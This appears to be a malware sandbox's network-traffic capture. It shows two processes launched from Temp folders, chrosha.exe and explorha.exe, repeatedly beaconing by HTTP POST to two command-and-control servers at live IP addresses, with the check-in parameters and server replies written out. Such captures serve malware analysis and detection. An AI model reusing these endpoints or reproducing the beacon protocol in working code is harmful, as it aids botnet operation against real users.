Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:09.961931944 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:10.204410076 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
911 | 192.168.2.5 | 50761 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:10.371602058 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:10.622262001 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
912 | 192.168.2.5 | 50762 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:10.446630955 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:10.688627005 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
913 | 192.168.2.5 | 50763 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:10.872971058 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:11.124805927 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
914 | 192.168.2.5 | 50764 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:11.052632093 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:11.297044992 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
915 | 192.168.2.5 | 50765 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:11.246938944 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:11.494575024 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
916 | 192.168.2.5 | 50766 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:11.550946951 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:11.800662041 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
917 | 192.168.2.5 | 50767 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:11.755424976 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:12.011430025 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
918 | 192.168.2.5 | 50768 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:12.166714907 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:12.414271116 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
919 | 192.168.2.5 | 50769 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:12.366102934 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:12.609262943 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
920 | 192.168.2.5 | 50770 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:12.663254023 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:12.909758091 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      921 | 192.168.2.5 | 50771 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:12.859205008 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.108330965 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      922 | 192.168.2.5 | 50772 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.269102097 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.510598898 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      923 | 192.168.2.5 | 50773 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.475799084 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.720532894 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      924 | 192.168.2.5 | 50774 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.761305094 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:14.013081074 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      925 | 192.168.2.5 | 50775 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.974232912 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:14.225613117 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      926 | 192.168.2.5 | 50776 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:14.371309042 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:14.619168997 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
927 | 192.168.2.5 | 50777 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:14.591427088 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:14.843400002 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
928 | 192.168.2.5 | 50778 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:14.865892887 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:15.112118959 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
